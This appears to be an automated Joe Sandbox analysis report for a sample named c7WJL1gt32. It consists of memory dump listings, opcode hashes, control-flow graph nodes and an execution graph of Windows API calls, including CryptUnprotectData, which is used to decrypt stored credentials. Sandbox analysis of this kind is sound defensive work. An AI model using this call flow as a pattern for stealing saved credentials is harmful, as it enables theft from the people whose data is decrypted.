                                                                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                                                          • String ID:
                                                                                                          • API String ID: 190613189-0
                                                                                                          • Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                          • Instruction ID: 3eb9f18af2c16f81f4dc7877ab3147293eaebe45f2d41041cd024b5e05e36bdf
                                                                                                          • Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                          • Instruction Fuzzy Hash: 4AF0C831100514AFC7029B94DD4099FBBA8DF06354B25407AE844FB211D634DF01AB98

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:10.1%
                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                          Signature Coverage:2.4%
                                                                                                          Total number of Nodes:245
                                                                                                          Total number of Limit Nodes:17
                                                                                                          execution_graph 40866 38332020 SetTimer 40867 3833208c 40866->40867 40868 3833e6d0 DispatchMessageW 40869 3833e73c 40868->40869 40870 383320c0 40873 383320ed 40870->40873 40871 3833213c 40871->40871 40873->40871 40874 383317fc 40873->40874 40875 38331807 40874->40875 40881 383317d0 40875->40881 40877 3833229c 40887 383195e8 40877->40887 40891 3831ec1a 40877->40891 40878 383322a5 40878->40871 40882 383317db 40881->40882 40895 3833181c GetCurrentThreadId 40882->40895 40884 383322f5 40885 38332461 GetCurrentThreadId 40884->40885 40886 383322f9 40884->40886 40885->40886 40886->40877 40888 383195f3 40887->40888 40890 3831ec47 40888->40890 40896 3831e7f4 40888->40896 40890->40878 40892 3831ec28 40891->40892 40893 3831e7f4 CreateWindowExW 40892->40893 40894 3831ec47 40892->40894 40893->40894 40894->40878 40895->40884 40898 3831e7ff 40896->40898 40897 3831f111 40897->40890 40898->40897 40901 3831faa1 40898->40901 40905 3831fab0 40898->40905 40902 3831fab0 40901->40902 40903 3831fb8a 40902->40903 40909 383300c0 40902->40909 40906 3831fadb 40905->40906 40907 3831fb8a 40906->40907 40908 383300c0 CreateWindowExW 40906->40908 40908->40907 40912 383301c8 40909->40912 40913 383301d3 CreateWindowExW 40912->40913 40914 38330234 40913->40914 40914->40914 40915 ad030 40916 ad048 40915->40916 40917 ad0a2 40916->40917 40923 383303f0 40916->40923 40926 383302c8 40916->40926 40931 383302b7 40916->40931 40936 38331bc0 40916->40936 40941 38331bd0 40916->40941 40924 38330407 40923->40924 40946 38330841 40923->40946 40924->40917 40927 383302ee 40926->40927 40929 38331bd0 4 API calls 40927->40929 40930 38331bc0 4 API calls 40927->40930 40928 3833030f 40928->40917 40929->40928 40930->40928 40932 383302c8 40931->40932 40934 38331bd0 4 API calls 40932->40934 40935 38331bc0 4 API calls 40932->40935 40933 3833030f 40933->40917 40934->40933 40935->40933 40937 38331bd0 40936->40937 40938 38331c2f 40937->40938 40995 38331d58 40937->40995 41005 38331d48 40937->41005 40942 38331bfd 40941->40942 40943 38331c2f 40942->40943 40944 38331d58 4 API calls 40942->40944 40945 38331d48 4 API calls 40942->40945 40944->40943 40945->40943 40949 38330856 40946->40949 40950 38330938 40946->40950 40955 38330928 40946->40955 40949->40924 40951 38330948 40950->40951 40952 38330965 40951->40952 40960 38330970 40951->40960 40972 38330980 40951->40972 40952->40949 40956 38330948 40955->40956 40957 38330965 40956->40957 40958 38330970 6 API calls 40956->40958 40959 38330980 6 API calls 40956->40959 40957->40949 40958->40957 40959->40957 40961 383309c6 GetCurrentProcess 40960->40961 40963 38330a11 40961->40963 40964 38330a18 GetCurrentThread 40961->40964 40963->40964 40965 38330a55 GetCurrentProcess 40964->40965 40966 38330a4e 40964->40966 40967 38330a8b 40965->40967 40966->40965 40984 38330f31 40967->40984 40986 38330b4f 40967->40986 40968 38330ab3 GetCurrentThreadId 40969 38330ae4 40968->40969 40969->40952 40973 383309c6 GetCurrentProcess 40972->40973 40975 38330a11 40973->40975 40976 38330a18 GetCurrentThread 40973->40976 40975->40976 40977 38330a55 GetCurrentProcess 40976->40977 40978 38330a4e 40976->40978 40979 38330a8b 40977->40979 40978->40977 40982 38330f31 40979->40982 40983 38330b4f 2 API calls 40979->40983 40980 38330ab3 GetCurrentThreadId 40981 38330ae4 40980->40981 40981->40952 40982->40980 40983->40980 40985 38330f4e 40984->40985 40985->40968 40990 38330bc0 40986->40990 40993 38330bc8 DuplicateHandle 40986->40993 40987 38330b8e 40987->40968 40991 38330bc8 DuplicateHandle 40990->40991 40992 38330c5e 40991->40992 40992->40987 40994 38330c5e 40993->40994 40994->40987 40996 38331d93 40995->40996 40997 38331d66 40995->40997 40996->40997 40999 38331d98 40996->40999 40998 38331d6e 40997->40998 41015 38331dc0 40997->41015 41019 38331db1 40997->41019 40998->40938 41000 383317d0 2 API calls 40999->41000 41001 38331da4 41000->41001 41001->40938 41002 38331dac 41002->40938 41006 38331d58 41005->41006 41007 38331d66 41006->41007 41009 38331d98 41006->41009 41008 38331d6e 41007->41008 41013 38331db1 CallWindowProcW 41007->41013 41014 38331dc0 CallWindowProcW 41007->41014 41008->40938 41010 383317d0 2 API calls 41009->41010 41011 38331da4 41010->41011 41011->40938 41012 38331dac 41012->40938 41013->41012 41014->41012 41016 38331e02 41015->41016 41018 38331e09 41015->41018 41017 38331e5a CallWindowProcW 41016->41017 41016->41018 41017->41018 41018->41002 41020 38331dc0 41019->41020 41021 38331e5a CallWindowProcW 41020->41021 41022 38331e09 41020->41022 41021->41022 41022->41002 41023 15b168 41024 15b174 41023->41024 41033 37b60198 41024->41033 41037 37b60188 41024->41037 41025 15b1a3 41041 3831bd48 41025->41041 41034 37b601a4 41033->41034 41057 37b6c638 41034->41057 41035 37b601da 41035->41025 41038 37b60198 41037->41038 41040 37b6c638 CryptUnprotectData 41038->41040 41039 37b601da 41039->41025 41040->41039 41042 3831bd54 41041->41042 41081 3831bd98 41042->41081 41045 38332730 41046 3833273f 41045->41046 41047 38330938 10 API calls 41046->41047 41048 38332746 41047->41048 41111 3833188c 41048->41111 41051 38332720 41052 3833273f 41051->41052 41053 38330938 10 API calls 41052->41053 41054 38332746 41053->41054 41055 3833188c 12 API calls 41054->41055 41056 15b1b1 41055->41056 41058 37b6c631 41057->41058 41058->41057 41059 37b6caf9 41058->41059 41061 37b6cf01 41058->41061 41059->41035 41062 37b6cf10 41061->41062 41065 37b6d57f 41062->41065 41066 37b6d59b 41065->41066 41070 37b6d7a0 41066->41070 41074 37b6d798 41066->41074 41067 37b6d629 41071 37b6d7bd 41070->41071 41078 37b6d1ec 41071->41078 41075 37b6d7bd 41074->41075 41076 37b6d1ec CryptUnprotectData 41075->41076 41077 37b6d7f5 41076->41077 41077->41067 41079 37b6d9e0 CryptUnprotectData 41078->41079 41080 37b6d7f5 41079->41080 41080->41067 41082 3831bdb4 41081->41082 41086 3831ce60 41082->41086 41090 3831ce50 41082->41090 41083 15b1aa 41083->41045 41083->41051 41087 3831ce7c 41086->41087 41094 383194b4 41087->41094 41089 3831ce9b 41089->41083 41091 3831ce7c 41090->41091 41092 383194b4 CreateWindowExW 41091->41092 41093 3831ce9b 41092->41093 41093->41083 41095 383194bf 41094->41095 41096 3831cf4f 41095->41096 41099 3831cf30 41095->41099 41107 3831cf68 41095->41107 41096->41089 41100 3831cf3f 41099->41100 41103 3831cf56 41099->41103 41104 3831cf30 CreateWindowExW 41100->41104 41105 3831cf4f 41100->41105 41106 3831cf68 CreateWindowExW 41100->41106 41101 3831d021 41101->41101 41102 383195e8 CreateWindowExW 41102->41101 41103->41101 41103->41102 41104->41105 41105->41096 41106->41105 41108 3831cf96 41107->41108 41109 3831d021 41108->41109 41110 383195e8 CreateWindowExW 41108->41110 41109->41109 41110->41109 41112 38331897 41111->41112 41114 38332866 41112->41114 41115 38331934 41112->41115 41121 3833193f 41115->41121 41116 38332e79 41117 38332ea9 41116->41117 41118 38332ac4 11 API calls 41116->41118 41122 38332ed4 41117->41122 41130 38332ac4 41117->41130 41118->41117 41120 38332ec1 41136 3833d6c1 41120->41136 41121->41116 41121->41122 41125 38333e40 41121->41125 41122->41112 41127 38333e61 41125->41127 41126 38333e85 41126->41116 41127->41126 41140 38333ff0 41127->41140 41146 38333fe0 41127->41146 41131 38332acf 41130->41131 41132 38330938 10 API calls 41131->41132 41135 3833d0a1 41131->41135 41133 3833d0bb 41132->41133 41172 3833c544 41133->41172 41135->41120 41137 3833d6f1 41136->41137 41138 38330938 10 API calls 41137->41138 41139 3833d77c 41137->41139 41138->41139 41142 38333ffd 41140->41142 41141 38330938 10 API calls 41143 3833402b 41141->41143 41142->41141 41144 38334036 41143->41144 41152 38332bec 41143->41152 41144->41126 41147 38333ff0 41146->41147 41148 38330938 10 API calls 41147->41148 41149 3833402b 41148->41149 41150 38334036 41149->41150 41151 38332bec 11 API calls 41149->41151 41150->41126 41151->41150 41153 38332bf7 41152->41153 41155 383340a8 41153->41155 41156 38332c20 41153->41156 41155->41155 41157 38332c2b 41156->41157 41162 38332c30 41157->41162 41160 38334517 41166 3833921c 41160->41166 41165 38332c3b 41162->41165 41163 383357a0 41163->41160 41164 38333e40 11 API calls 41164->41163 41165->41163 41165->41164 41167 38334551 41166->41167 41168 38339235 41166->41168 41167->41155 41170 3831faa1 CreateWindowExW 41168->41170 41171 3831fab0 CreateWindowExW 41168->41171 41169 38339321 41170->41169 41171->41169 41173 3833c54f 41172->41173 41175 3833d3bb 41173->41175 41176 3833c560 41173->41176 41175->41135 41177 3833d3f0 OleInitialize 41176->41177 41178 3833d454 41177->41178 41178->41175
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2950174813.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_150000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (okq$(okq$(okq$(okq$,oq$,oq$Hoq
                                                                                                          • API String ID: 0-804972777
                                                                                                          • Opcode ID: 5716aed516f4e2cdff4e8ffc6d01953da39b94bff0a0c4e4b6ede01238541f78
                                                                                                          • Instruction ID: c556accf7946eeb073cb8b2432babcd8880b6ebec4f381215b6b2266bec316c3
                                                                                                          • Opcode Fuzzy Hash: 5716aed516f4e2cdff4e8ffc6d01953da39b94bff0a0c4e4b6ede01238541f78
                                                                                                          • Instruction Fuzzy Hash: FB725070A00219CFCB14CF69C994AAEBBF6BF88301F558159E815EB3A5DB34DD85CB90

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 254 1519c4-1519ce 256 1519d0-1519d9 254->256 257 151959-151962 254->257 259 151968-151971 256->259 260 1519db-1519ea 256->260 258 151964-151966 257->258 258->259 264 151978-1519a0 259->264 261 151975-151977 260->261 262 1519ec-151a13 260->262 261->258 261->264 267 151a35-151a84 262->267 268 151a15-151a34 262->268 272 151a86-151a8d 267->272 273 151a9f 267->273 274 151a96-151a9d 272->274 275 151a8f-151a94 272->275 276 151aa7 273->276 277 151aaa-151abe 274->277 275->277 276->277 279 151ad4-151adc 277->279 280 151ac0-151ac7 277->280 283 151ade-151ae2 279->283 281 151acd-151ad2 280->281 282 151ac9-151acb 280->282 281->283 282->283 285 151ae4-151af9 283->285 286 151b42-151b45 283->286 285->286 294 151afb-151afe 285->294 287 151b47-151b5c 286->287 288 151b8d-151b93 286->288 287->288 298 151b5e-151b62 287->298 289 15268e 288->289 290 151b99-151b9b 288->290 295 152693-152c33 289->295 290->289 292 151ba1-151ba6 290->292 296 15263c-152640 292->296 297 151bac 292->297 299 151b00-151b02 294->299 300 151b1d-151b3b call 1502a8 294->300 317 152c39-152c74 295->317 303 152647-15268d 296->303 304 152642-152645 296->304 297->296 305 151b64-151b68 298->305 306 151b6a-151b88 call 1502a8 298->306 299->300 301 151b04-151b07 299->301 300->286 301->286 308 151b09-151b1b 301->308 304->295 304->303 305->288 305->306 306->288 308->286 308->300 323 152c76-152ca1 317->323 325 152ca3-152ca5 323->325 326 152cb2-152cba 323->326 327 152ca7-152ca9 325->327 328 152cab-152cb0 325->328 329 152cbc-152cca 326->329 327->329 328->329 332 152ce0-152ce8 329->332 333 152ccc-152cce 329->333 337 152ceb-152cee 332->337 334 152cd7-152cde 333->334 335 152cd0-152cd5 333->335 334->337 335->337 338 152d05-152d09 337->338 339 152cf0-152cfe 337->339 340 152d22-152d25 338->340 341 152d0b-152d19 338->341 339->338 345 152d00 339->345 343 152d27-152d2b 340->343 344 152d2d-152d62 340->344 341->340 351 152d1b 341->351 343->344 347 152d64-152d7b 343->347 352 152dc4-152dc9 344->352 345->338 349 152d81-152d8d 347->349 350 152d7d-152d7f 347->350 353 152d97-152da1 349->353 354 152d8f-152d95 349->354 350->352 351->340 356 152da9 353->356 357 152da3 353->357 354->356 359 152db1-152dbd 356->359 357->356 359->352
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2950174813.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_150000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Xoq$Xoq$Xoq$Xoq$Xoq$Xoq
                                                                                                          • API String ID: 0-1596160944
                                                                                                          • Opcode ID: 07893593fb3073976b89835fd993ff669e5031da55f5ce2c49190b9400dc212d
                                                                                                          • Instruction ID: b7c702598eabf5b961978dfb501f8fe7423923747c583d75c803d18a02178a4d
                                                                                                          • Opcode Fuzzy Hash: 07893593fb3073976b89835fd993ff669e5031da55f5ce2c49190b9400dc212d
                                                                                                          • Instruction Fuzzy Hash: D352FBA7E1D3E18FC7134B705CB82597F716B62106BDE459EC8C287287EBA58489C353

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 472 154328-154368 474 15436f-15444c call 153168 call 152c88 472->474 475 15436a 472->475 485 154453-154471 474->485 486 15444e 474->486 475->474 516 154474 call 154620 485->516 517 154474 call 15461d 485->517 486->485 487 15447a-154485 488 154487 487->488 489 15448c-154490 487->489 488->489 490 154495-15449c 489->490 491 154492-154493 489->491 493 1544a3-1544b1 490->493 494 15449e 490->494 492 1544b4-1544f8 491->492 498 15455e-154575 492->498 493->492 494->493 500 154577-15459c 498->500 501 1544fa-154510 498->501 507 1545b4 500->507 508 15459e-1545b3 500->508 505 154512-15451e 501->505 506 15453a 501->506 509 154520-154526 505->509 510 154528-15452e 505->510 511 154540-15455d 506->511 508->507 512 154538 509->512 510->512 511->498 512->511 516->487 517->487
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2950174813.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_150000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
                                                                                                          • API String ID: 0-1749821215
                                                                                                          • Opcode ID: d75a3dac763e05df89dce9ac96df77ddea6baa0c20f080b84c65845a6d289746
                                                                                                          • Instruction ID: 0b432f5015e1e9749c4af4c4dd3db9b20523a27afb88b6f17792693ede863543
                                                                                                          • Opcode Fuzzy Hash: d75a3dac763e05df89dce9ac96df77ddea6baa0c20f080b84c65845a6d289746
                                                                                                          • Instruction Fuzzy Hash: C491B474E00218DFDB14DFAAD884A9DBBF2BF89305F14C069E819AB365DB349985CF50
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2950174813.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_150000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (okq$4'kq$4'kq
                                                                                                          • API String ID: 0-947883942
                                                                                                          • Opcode ID: 85996fe1c9a7339492de8082bfb80cd59b084ab14db7958979d8c696b9414094
                                                                                                          • Instruction ID: 11b35613b7ee207b686e5a5eef401f07ca247e6a7e05a3362bef7426dd87d5ba
                                                                                                          • Opcode Fuzzy Hash: 85996fe1c9a7339492de8082bfb80cd59b084ab14db7958979d8c696b9414094
                                                                                                          • Instruction Fuzzy Hash: 8BA27F70A04209DFCB15CF68C994AAEBBB2FF88301F15855AE815DF261D734ED89CB61
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2980347566.0000000038330000.00000040.00000800.00020000.00000000.sdmp, Offset: 38330000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_38330000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Tekq
                                                                                                          • API String ID: 0-2319236580
                                                                                                          • Opcode ID: 7f66ce2c2d7429aec3896baeb1127f51fa27ab99d01c90ac3d4d223adb07e976
                                                                                                          • Instruction ID: 553c3a71e2034b7caf3b3f8e07b92f222a5135492d6b4931867a7204a21ac81b
                                                                                                          • Opcode Fuzzy Hash: 7f66ce2c2d7429aec3896baeb1127f51fa27ab99d01c90ac3d4d223adb07e976
                                                                                                          • Instruction Fuzzy Hash: CB82B174A41328CFDB25DF64C994BA9B7B2FB89700F1085A9D909B7364CB359E82CF44
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2980323979.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_38310000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Tekq
                                                                                                          • API String ID: 0-2319236580
                                                                                                          • Opcode ID: 493fb3efe459ad9e03fca943bfab1bb142ade09fd9a1cabf9faf2d6e9688f241
                                                                                                          • Instruction ID: a60583e3297e62534f9b63a07b84b132fd6cf9d76180e83a187c0947dcccb8d4
                                                                                                          • Opcode Fuzzy Hash: 493fb3efe459ad9e03fca943bfab1bb142ade09fd9a1cabf9faf2d6e9688f241
                                                                                                          • Instruction Fuzzy Hash: 1372C274A40318CFDB25DF64C994BA9B7B2FB89700F1085A9D909B7364CB359E82CF54
                                                                                                          APIs
                                                                                                          • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 37B6DA45
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2979934383.0000000037B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B60000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_37b60000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CryptDataUnprotect
                                                                                                          • String ID:
                                                                                                          • API String ID: 834300711-0
                                                                                                          • Opcode ID: b86b66be74f8bb2087969c7a5a3be64183ff72b0b23c69d01dfbe83b0ac5bbc0
                                                                                                          • Instruction ID: 57e63e78a880711c48750ba428facfdb4c256bd0958affe84a92a7288d420fc9
                                                                                                          • Opcode Fuzzy Hash: b86b66be74f8bb2087969c7a5a3be64183ff72b0b23c69d01dfbe83b0ac5bbc0
                                                                                                          • Instruction Fuzzy Hash: 501134B6800249EFDB10CF99C945BDEBFF4EF48320F148419EA58A7211C339A590DFA5
                                                                                                          APIs
                                                                                                          • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 37B6DA45
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2979934383.0000000037B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B60000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_37b60000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CryptDataUnprotect
                                                                                                          • String ID:
                                                                                                          • API String ID: 834300711-0
                                                                                                          • Opcode ID: 5986aa3f0617446b11ca94dcf0d13b2908a93a0e38d7cab62256e689c59c8bf8
                                                                                                          • Instruction ID: a94d8618845984beb6221aaa8aa8a47e07d788f03d1c99bc620246738954e6d4
                                                                                                          • Opcode Fuzzy Hash: 5986aa3f0617446b11ca94dcf0d13b2908a93a0e38d7cab62256e689c59c8bf8
                                                                                                          • Instruction Fuzzy Hash: 921144B2800249AFDB10CF99C805BEEBBF4EF48360F108419E618B7211C739A950DFA5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2980323979.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_38310000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a565caa53498e7ab20b74ae6708d263b8ac359cc0090a0c6f67651567962a97f
                                                                                                          • Instruction ID: 9af956cc8a8fe32ca8cf9286bc8dc814a7ac27b5da6af762fa1eb7cc545e90fc
                                                                                                          • Opcode Fuzzy Hash: a565caa53498e7ab20b74ae6708d263b8ac359cc0090a0c6f67651567962a97f
                                                                                                          • Instruction Fuzzy Hash: B272CD74E01228CFDB64DF69C980BD9BBB2BB49300F5091EAE909A7355DB349E81CF54
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2979934383.0000000037B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B60000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_37b60000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 7a7027d26d782af9b191bfa4b3a7d87d6ab41f5f8dc4848868e915546b0bb4b5
                                                                                                          • Instruction ID: f522efabee0c5e0ff91e994c3fad299d1461d16e5f922eda7ca64adf690b99bb
                                                                                                          • Opcode Fuzzy Hash: 7a7027d26d782af9b191bfa4b3a7d87d6ab41f5f8dc4848868e915546b0bb4b5
                                                                                                          • Instruction Fuzzy Hash: 27E1D274E01218CFEB14CFA5C944B9DBBB2BF89304F2080AAD509B7295DB355E86CF55
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2979934383.0000000037B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B60000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_37b60000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 017b2c55a04b0fe3981e11e5825b64723bf9e0f7a9b17cd864ef7b43cbafe025
                                                                                                          • Instruction ID: df3c3d84b0472d71d92c368114b08e64574c317087588845703c7c862ac40c91
                                                                                                          • Opcode Fuzzy Hash: 017b2c55a04b0fe3981e11e5825b64723bf9e0f7a9b17cd864ef7b43cbafe025
                                                                                                          • Instruction Fuzzy Hash: AED19074E01218CFEB54DFA9C954BADBBB2BF88301F1081A9D909A7355DB359E86CF10
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2979934383.0000000037B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B60000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_37b60000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 2f6bd24371f90229b4f3233b5ff5e0024805df9b16ec21df844a5e133b9614a9
                                                                                                          • Instruction ID: 212fe94b16649224cabb1eead7fac8ea9fb2b8e4ffcec3da78f18be30f1aed5d
                                                                                                          • Opcode Fuzzy Hash: 2f6bd24371f90229b4f3233b5ff5e0024805df9b16ec21df844a5e133b9614a9
                                                                                                          • Instruction Fuzzy Hash: BEA115B4D00218CFEB14DFA9D588B9DBBB1FF88314F209269E508B72A1DB749985CF54
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2979934383.0000000037B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B60000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_37b60000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 722c9137324c2fde7bade891e6117f6ac1c071a9c2a6f99c96d02e7f0cb062e7
                                                                                                          • Instruction ID: f99b0a8276bac5d252812f44cc02e88792fa3224402250a9999349cfca747be5
                                                                                                          • Opcode Fuzzy Hash: 722c9137324c2fde7bade891e6117f6ac1c071a9c2a6f99c96d02e7f0cb062e7
                                                                                                          • Instruction Fuzzy Hash: 5FA105B4D00218CFEB14DFA9D588BDDBBB1FF88314F209269E508A72A1DB749985CF54
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2980323979.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_38310000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 362050a175e064160bc317a6ffdabdb36a36c0d28f87c473b220850974039928
                                                                                                          • Instruction ID: 4e7fc33e5a65f3921d1a6059e26b77312ecf5c675fd34fb40162db4735e69147
                                                                                                          • Opcode Fuzzy Hash: 362050a175e064160bc317a6ffdabdb36a36c0d28f87c473b220850974039928
                                                                                                          • Instruction Fuzzy Hash: 74A19FB4E01228CFEB18DF6AC944B9DFBF2AF89301F14D0AAD408A7255DB345A85CF51
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2980323979.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_38310000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 7350cfd5139c9033236973b245500b48a7c50c2bad74aaed7482ca98d0685261
                                                                                                          • Instruction ID: 59fe9e395d631b4029bfd2eb4634198f9b4ca6a93edbe96065557508742073cc
                                                                                                          • Opcode Fuzzy Hash: 7350cfd5139c9033236973b245500b48a7c50c2bad74aaed7482ca98d0685261
                                                                                                          • Instruction Fuzzy Hash: 55A19FB4E012288FEB18DF6AC944B9DBBF2AF89301F54C0AAD40DA7251DB745A85CF51
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2980323979.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_38310000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 27873f20832c3b6f2725bf13b098a4314b7d652c48cd46e3f1ebd0e1802fcb82
                                                                                                          • Instruction ID: 4be1b6b0eda9f4b65117f8959ed6cc794617c4ebeed4a8da75517a799341b2fd
                                                                                                          • Opcode Fuzzy Hash: 27873f20832c3b6f2725bf13b098a4314b7d652c48cd46e3f1ebd0e1802fcb82
                                                                                                          • Instruction Fuzzy Hash: E0A190B4E016288FEB18DF6AC944B9DBBF2AF89301F14C1AAD408B7255DB345A85CF51
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2980323979.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_38310000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
